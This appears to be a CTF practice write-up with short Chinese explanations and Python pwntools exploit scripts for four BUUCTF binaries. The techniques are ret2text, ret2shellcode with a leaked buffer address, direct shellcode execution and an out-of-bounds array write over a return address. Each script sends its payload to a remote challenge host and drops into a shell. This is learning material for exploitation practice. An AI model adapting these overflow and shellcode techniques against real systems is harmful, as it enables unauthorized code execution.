PWN-PRACTICE-BUUCTF-30
suctf_2018_stack
栈溢出, ret2text。返回地址不能直接取 next_door 函数的起始地址, 而是设为 0x40067A (脚本中的 shell): 从这里开始设置系统调用的参数以及系统调用号。
from pwn import *
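# Address inside next_door to return into: the spot where the syscall
# arguments and syscall number get set up (see the note above on why the
# function's first instruction is not used).
SHELL = 0x000000000040067A

# Distance from the start of the overflowed buffer to the saved return
# address (0x20 + 8 in the original; presumably buffer plus saved rbp).
RET_OFFSET = 0x20 + 8


def build_payload(ret_addr, ret_offset=RET_OFFSET):
    """Return the overflow payload: ``ret_offset`` filler bytes followed by
    ``ret_addr`` as a little-endian 64-bit word (the same bytes p64 emits).

    Built from bytes throughout: the original ``'a' * n + p64(...)`` mixed
    str and bytes and raises TypeError on Python 3.

    Raises struct.error if ``ret_addr`` does not fit in 64 bits.
    """
    import struct
    return b'a' * ret_offset + struct.pack('<Q', ret_addr)


def main():
    """Connect (remote by default, ``LOCAL`` on argv for a local process),
    wait for the banner, send the overflow and drop into the shell."""
    if args.DEBUG:  # `python exploit.py DEBUG` for pwntools packet logging
        context.log_level = 'debug'
    if args.LOCAL:
        io = process('./SUCTF_2018_stack')
    else:
        io = remote('node4.buuoj.cn', 26579)
    io.recvuntil('============================\n')
    io.sendline(build_payload(SHELL))
    io.interactive()


if __name__ == '__main__':
    main()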
wdb_2018_3rd_soEasy
程序给出了输入缓冲区在栈上的地址, 且 NX disabled, 因此栈溢出 ret2shellcode: shellcode 放在缓冲区开头, 返回地址指回泄露的缓冲区地址。
from pwn import *
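# Distance from the start of the input buffer to the saved return address
# (0x48 + 4 in the original; presumably the buffer plus the saved ebp).
RET_OFFSET = 0x48 + 4


def build_payload(shellcode, buf_addr, ret_offset=RET_OFFSET):
    """Return shellcode at the top of the buffer, filler up to the saved
    return address, then ``buf_addr`` as a little-endian 32-bit word (the
    same bytes p32 emits) so the function returns into the shellcode.

    Raises ValueError when the shellcode is longer than ``ret_offset``:
    ``ljust`` never truncates, so an oversized shellcode would silently push
    the return address past its slot instead of overwriting it.

    Uses a bytes filler: the original ``shellcode.ljust(n, 'a')`` mixed
    bytes and str and raises TypeError on Python 3.
    """
    import struct
    if len(shellcode) > ret_offset:
        raise ValueError('shellcode is %d bytes, slot is %d bytes'
                         % (len(shellcode), ret_offset))
    return shellcode.ljust(ret_offset, b'a') + struct.pack('<I', buf_addr)


def main():
    """Read the leaked buffer address, then send shellcode + return address."""
    context.arch = 'i386'  # asm()/shellcraft target 32-bit x86
    if args.LOCAL:
        io = process('./wdb_2018_3rd_soEasy')
    else:
        io = remote('node4.buuoj.cn', 25581)
    io.recvuntil('a gift->0x')
    # The leak is printed as hex digits up to the newline; strip() also
    # tolerates a trailing '\r'.
    buf_addr = int(io.recvuntil('\n').strip(), 16)
    io.recvuntil('to do?\n')
    shellcode = asm(shellcraft.sh())
    io.sendline(build_payload(shellcode, buf_addr))
    io.interactive()


if __name__ == '__main__':
    main()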
[BSidesCF 2019]Runit
栈溢出,ret2shellcode
from pwn import *
# asm()/shellcraft generate code for 32-bit x86.
context.arch = 'i386'
#io=process('./BSidesCF_2019_Runit')
io = remote('node4.buuoj.cn', 25615)
elf = ELF('./BSidesCF_2019_Runit')
# Wait for the prompt, then send an execve("/bin/sh") stub. No padding or
# return address is sent here; the writeup classifies this as ret2shellcode,
# so presumably the program jumps to the received input directly.
io.sendlineafter('stuff!!\n', asm(shellcraft.sh()))
io.interactive()
qctf2018_stack2
数组越界写, ret2text: 利用未做边界检查的下标, 从 0x84 起逐字节 (小端序) 把返回地址改写为后门地址 0x0804859B, 再选择退出让函数返回到后门。
from pwn import *
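# Address the saved return address is redirected to (the original spelled
# it out as the little-endian byte list [0x9b, 0x85, 0x04, 0x08]).
BACKDOOR = 0x0804859B

# Array index at which the saved return address starts (0x84 in the writeup).
RET_OFFSET = 0x84


def le_bytes(value, width=4):
    """Split ``value`` into ``width`` little-endian byte values (ints 0..255),
    least-significant byte first -- the order the out-of-bounds writes use.

    Raises ValueError if ``value`` does not fit in ``width`` bytes, so a
    mistyped address cannot be silently truncated.
    """
    if not 0 <= value < 1 << (8 * width):
        raise ValueError('0x%x does not fit in %d bytes' % (value, width))
    return [(value >> (8 * i)) & 0xFF for i in range(width)]


def main():
    """Rewrite the return address one byte at a time through the unchecked
    array index, then pick the last menu item so the function returns."""
    if args.LOCAL:
        io = process('./qctf2018_stack2')
    else:
        io = remote('node4.buuoj.cn', 28396)
    io.sendlineafter('you have:\n', '0')  # presumably the element count
    for i, byte in enumerate(le_bytes(BACKDOOR)):
        io.sendlineafter('exit\n', '3')                    # the 'change' menu item
        io.sendlineafter('change:\n', str(RET_OFFSET + i))  # unchecked index
        io.sendlineafter('number:\n', str(byte))           # value, sent in decimal
    io.sendlineafter('exit\n', '5')  # menu item after the writes; triggers the return
    io.interactive()


if __name__ == '__main__':
    main()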